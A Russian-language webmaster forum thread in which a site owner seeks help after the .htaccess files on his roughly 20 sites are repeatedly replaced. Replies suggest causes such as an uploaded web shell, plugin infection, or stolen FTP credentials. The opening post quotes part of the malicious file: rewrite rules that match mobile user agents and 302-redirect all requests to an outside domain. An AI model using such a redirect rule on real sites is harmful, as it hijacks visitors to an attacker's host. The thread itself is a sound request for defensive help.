Вредоносный .htaccess как избавиться от заразы ?

V7
На сайте с 27.11.2010
Offline
121
7647

Добрый день. У меня следующая проблема.

На всех сайтах моего хостера (все сайты на одном аккаунте их около 20) регулярно подменяется .htaccess на вредоносный, такого вида.

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]

... тут еще много всего перечислено ..

RewriteRule ^(.*)$ http://httpupd.com/s/4087 [L,R=302]

Притом это не зависит от движка сайта (Joomla, Wordpress или голый HTML), меняется даже там где всего лишь один единственный index.html

Обратился к хостеру, посоветовали поменять пароли и закрыть доступ по ftp

Предпринимаемые действия: изменил пароль на ftp, изменил пароль входа в админ панель хостера, изменил пароль для доступа к MySQL. Ситуация не поменялась. Вообще полностью закрыл доступ к ftp, проблема не исчезла. Менял права на .htaccess, всем дольно на чтение, не помогло.

Просматривал скрипты на наличие iframe, левых ява скриптов, все чисто. Подскажите, какие еще действия можно предпринять ?

Заранее спасибо.

fubzy
На сайте с 16.01.2010
Offline
46
#1

У меня была похожая проблема - через какой-то плагин для ВП загрузился вирус.

Попробуйте удалить последние/проверить файлы на вирусы.

К чёрту обстоятельства, создавай возможности!
hosting_manager
На сайте с 26.03.2010
Offline
292
#2

Скорее всего вредоносный троян засел у Вас на компьютере, советую не сохранять пароли ftp там, не подключаться по ftp с зараженного компьютера.

ua-hosting.company: серверы в NL/US со скидкой 30% нашим читателям: E5-2650v4/10GB DDR4/240GB SSD/1 Gbps - от $20 ()
V7
На сайте с 27.11.2010
Offline
121
#3
hosting_manager:
Скорее всего вредоносный троян засел у Вас на компьютере, советую не сохранять пароли ftp там, не подключаться по ftp с зараженного компьютера.

Это происходит даже тогда, когда доступ по ftp вообще отключен для всех и для меня тоже.

M
На сайте с 19.01.2011
Offline
65
#4

Если заряжение происходит по фтп - то это видно в лога сервера спросите у хостера. В противном случае дыра у Вас на сайте. Также проверьте нет ли у Вас папок с правами доступа 777.

________________________ я больше не хостер ....
V7
На сайте с 27.11.2010
Offline
121
#5
mvolgin:
Если заряжение происходит по фтп - то это видно в лога сервера спросите у хостера. В противном случае дыра у Вас на сайте. Также проверьте нет ли у Вас папок с правами доступа 777.

Попросил логи. В логах чисто, кроме меня по ftp никто ничего не закачивал.

хабиб
На сайте с 23.06.2010
Offline
135
#6

Такая же ситуация как и у ТС, один в один. Кто-то подскажет что-то путное?

хостинговый хостинг (http://www.ihc.ru/?ref=7589)
Z
На сайте с 08.07.2009
Offline
95
#7
хабиб:
Такая же ситуация как и у ТС, один в один. Кто-то подскажет что-то путное?

У меня было подобное, через устаревшую версию загрузчика файлов загрузили шелл на сайт, пришлось обращаться к знающему человеку, он нашел шел и дырку, шел выглядел как файловый менеджер, найти шел по дате изменения файлов было не возможно.

Lisa
На сайте с 31.01.2002
Offline
438
#8

У сайтов есть права на запись в папки друг друга?

Обычно бывают, причем еще и между разными пользовательскими аккаунтами тоже бывают :D

Соответственно, искать надо уже лежащий файлик, который дает доступ тому, кто знает, где он лежит и как им пользоваться.

Digital Development (https://ddplanet.ru/)
Den73
На сайте с 26.06.2010
Offline
523
#9

тс у вас шелл залитый где то лежит, найти можно бонально изучив access.log

если не можете самостоятельно попросите хостера или наймите того кто может.

V7
На сайте с 27.11.2010
Offline
121
#10

Пока борюсь подручными методами. Написал скрипт, который отслеживает изменения в .htaccess. Как только размер .htaccess меняется, скрипт заливает правильный .htaccess и пишет лог, когда это произошло. Это происходит одномоментно на всех своих 25 сайтах.

Сегодня думаю поставить правильные права на папки и файлы, выкачать все 25 сайтов (они у меня на одном аккаунте) и искать подозрительные файлы.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий